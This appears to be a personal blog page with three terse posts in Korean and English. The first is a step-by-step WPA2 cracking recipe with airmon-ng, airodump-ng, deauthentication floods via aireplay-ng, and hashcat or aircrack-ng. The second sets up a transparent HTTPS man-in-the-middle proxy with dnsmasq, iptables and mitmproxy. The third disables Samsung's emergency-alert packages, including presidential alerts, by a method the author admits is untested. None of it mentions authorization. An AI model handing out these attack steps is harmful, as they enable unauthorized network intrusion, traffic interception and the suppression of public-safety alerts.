All posts by RSR

WPA2 Crack with hashcat

WPA2는 인증할때 salt와 kdf2값의 패킷을 수집하여 이를 BF 또는 Dict 공격하는 방법이 있다.

Enter wlan interface to monitor mode

airmon-ng start wlp4s0
airmon-ng check kill
rfkill list
rfkill unblock [dev_id]

Scan APs

airodump-ng -c 5 wlp4s0mo [–band a (for 5ghz)]
airodump-ng –bssid [bssid] -c 6 –write packet wlp4s0mo

Send Deauth Packet

aireplay-ng –deauth 100 -a [Station] wlp4s0mo

Convert cap to haccpx – out dated way

cap2hccapx.bin packet-01.cap out.haccpx

Convert cap to hc22000

hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng

Run hashcat

hashcat -m 2500 out.hccapx -a3 -?d?d?d?d?d?d?d?d -w3

hashcat -m 22000 hash.hc22000 wordlist.txt

or use aircrack-ng

$ aircrack-ng dumpfile.pcapng -w wordlist.txt

HTTPS MITM with transparent mode

 

set ipaddress for client adaptor

Edit /etc/network/interfaces:

# Proxy Server network interface
auto eth1
iface eth1 inet static
address 192.168.3.1
netmask 255.255.255.0
gateway 0.0.0.0

solve 53 port confiliction

# vi /etc/systemd/resolved.conf   > DNSStubListener=no
# systemctl restart systemd-resolved

config dnsmasq

Then replace /etc/dnsmasq.conf with:

# Listen for DNS requests on the internal network
interface=eth1
# Act as a DHCP server, assign IP addresses to clients
dhcp-range=192.168.3.10,192.168.3.100,96h
# Broadcast gateway and dns server information
dhcp-option=option:router,192.168.3.1
dhcp-option=option:dns-server,192.168.3.1

# systemctl restart dnsmasq

Sysctls

sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv6.conf.all.forwarding=1
sysctl -w net.ipv4.conf.all.send_redirects=0

Rrerouting

iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 443 -j REDIRECT --to-port 8080

Start mitmproxy

$ mitmweb --mode transparent --showhost

https://docs.mitmproxy.org/stable/concepts-modes/#socks-proxy

https://docs.mitmproxy.org/stable/howto-transparent/

https://nickcharlton.net/posts/transparent-proxy-virtual-machines-mitmproxy.html

삼성 갤럭시 재난알림문자 차단 방법

재난문자는 Cell Broadcast Service라고도 불리며 Wartime alert, Information notification, Emergency alert 3가지 단계가 있는데 이중 Wartime alert은 유저레벨에서 컨트롤이 불가능하다. (코드상 cmas_presidential_level_alert)
하지만 관련 패키지를 비활성화 시키면 차단이 가능하다.

관련 패키지를 확인해보면 아래와 같이 4개의 패키지가 확인되는데 (SGS10 5G 기준)
$ pm list packages -f | grep cellbroadcast
package:/system/system_ext/overlay/CellBroadcastConfigOverlayPlatform_KR.apk=com.google.android.overlay.modules.cellbroadcastreceiver
package:/system/system_ext/priv-app/CellBroadcastAppPlatform/CellBroadcastAppPlatform.apk=com.android.cellbroadcastreceiver
package:/system/priv-app/CellBroadcastServiceModulePlatform/CellBroadcastServiceModulePlatform.apk=com.android.cellbroadcastservice
package:/system/system_ext/overlay/CellBroadcastServiceOverlay.apk=com.google.android.overlay.modules.cellbroadcastservice

아래의 명령어로 몽땅 비활성화 시켜준다.
$ pm disable-user –user 0 com.google.android.overlay.modules.cellbroadcastreceiver
$ pm disable-user –user 0 com.android.cellbroadcastreceiver
$ pm disable-user –user 0 com.android.cellbroadcastservice
$ pm disable-user –user 0 com.google.android.overlay.modules.cellbroadcastservice

이후 확인해보면

재난알림 관련 항목들이 사라진것을 볼 수 있다.

※사실 확인 되지 않은 방법임 (이후로 받아볼수가 없었다…) 책임은 각자 알아서,